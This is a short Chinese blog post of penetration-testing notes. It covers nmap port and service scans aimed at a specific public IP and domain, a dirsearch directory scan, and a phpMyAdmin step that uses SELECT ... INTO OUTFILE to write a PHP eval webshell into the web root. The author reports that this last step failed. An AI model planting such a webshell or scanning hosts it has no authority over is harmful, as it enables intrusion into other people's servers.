安装
# Centos7安装
yum install nmap
使用
# 默认端口扫描
nmap 47.103.149.121
# 支持域名扫描
nmap ooopic.com
# 指定服务或端口扫描
nmap 47.103.149.121 -p http,https -v
# 端口扫描
nmap --min-rate 10000 -p- 47.103.149.121
# 扫描端口服务
nmap -p 80,3306 -sV 47.103.149.121
# dirsearch扫一下目录。
dirsearch -u http://47.103.149.121
输出信息控制
-v 选项,显示详细信息,可以 -vv 或-v2 获取更详细信息;
-d 选项,显示调试信息,可以 -dd 或 -d2 获取更详细的调试信息;
–packet-trace 选项,显示数据包追踪
其他还有 –reason、–open、–iflist、–stylesheet、–webxml、-no-stylesheet ,可以查看nmap -h ,没什么要说明的内容
参考:https://www.freebuf.com/articles/web/376275.html
phpmyadmin注入
# phpmyadmin后台getshell
# 1.into outfile写入木马
# 已经知道了网站绝对路径,直接写入试试。
select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/shell.php';
# 失败。应该是secure_file_priv的值为NULL,导致不被允许读取任何文件。可以查看一下:
show global variables like '%secure%';
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 [email protected]
